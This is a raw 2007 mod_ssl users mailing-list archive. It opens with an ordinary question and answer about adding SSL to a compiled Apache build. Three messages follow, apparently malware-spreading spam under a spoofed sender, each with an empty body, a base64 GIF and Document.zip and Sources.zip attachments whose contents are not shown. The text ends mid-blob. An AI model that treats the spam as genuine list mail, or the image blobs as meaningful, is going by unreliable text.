Shahadat Hossain wrote:

> As far as I know, if you install openSSL, that actually configure 
> apache to use SSL. But I never tried that (so, don't shout at me if it 
> does not work, ok?).
>  
> And if you want to install apache again, thats pretty simple. Just do 
> the whole installation process once again. This time make sure to 
> include the switches. This will simply overwrite the old files and you 
> will be able to get it up without any further trouble.
>  
> (Please remember, I do not take any responsibility for the free advice 
> I give ;-)  )
>  
> --Hossain
>
>  
> On 1/10/07, *Karl R. Balsmeier*  > wrote:
>
>     I.
>
>     Is there a way to add the SSL support "after the fact?"  I
>     compiled and
>     simply forgot to add the flag.  The flag I used to compile is:
>
>     ./configure --prefix=/usr/local/apache --enable-mods-shared=most
>
>     What would I do to simply add the SSL in afterward?  From what I can
>     tell this shop doesn't do the DSO approach, so that's perhaps not
>     an option.
>
>     Is there a static way to do this or should I start from scratch?
>
>     II.
>     REMOVAL question:
>
>     If I need to wipe it all and start from scratch -is there a smart
>     way to
>     go about removing apache?
>
>     Here's what I did in total, it's been working great, save for my error
>     in not getting SSL on there.  -would I be better off with just using
>     enable-mods-shared ALL (that includes SSL right?)
>
>     cd /usr/local/src
>
>     wget http://www.mirrorgeek.com/apache.org/httpd/httpd-2.0.58.tar.gz
>
>     tar -xzf httpd-2.0.58.tar.gz
>     cd httpd-2.0.58
>
>     ./configure --prefix=/usr/local/apache --enable-mods-shared=most
>
>     make
>
>     make install
>
>     ln -s /usr/local/apache/bin/apachectl /etc/rc.d/init.d/httpd
>
>     cp -v /usr/local/src/build/configs/httpd.conf /usr/local/apache/conf/
>
>     cp -v /usr/local/src/build/configs/index.html
>     /usr/local/apache/htdocs/
>
>     vi /usr/local/apache/conf/httpd.conf
>
>
>
>     ______________________________________________________________________
>     Apache Interface to OpenSSL (mod_ssl)                  
>     www.modssl.org 
>     User Support Mailing
>     List                      modssl-users@modssl.org
>     
>     Automated List Manager                            
>     majordomo@modssl.org 
>
>
>
>
> -- 
> I'm changing everyday...
> so are my views...
> hence I deny any responsibility/(ies)...
> for what I said yesterday... ;-) 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 12 18:49:16 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E642314D88B; Fri, 12 Jan 2007 18:49:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 469B414D841
	for ; Fri, 12 Jan 2007 18:49:16 +0100 (CET)
Date: Fri, 12 Jan 2007 13:00:36 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 16 15:59:54 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DA39B14D87B; Tue, 16 Jan 2007 15:59:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 5F08E14D83A
	for ; Tue, 16 Jan 2007 15:59:54 +0100 (CET)
Date: Tue, 16 Jan 2007 10:11:23 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 17 17:38:13 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AC71714D85A; Wed, 17 Jan 2007 17:38:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 0ADCB14D835
	for ; Wed, 17 Jan 2007 17:38:12 +0100 (CET)
Date: Wed, 17 Jan 2007 11:49:44 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
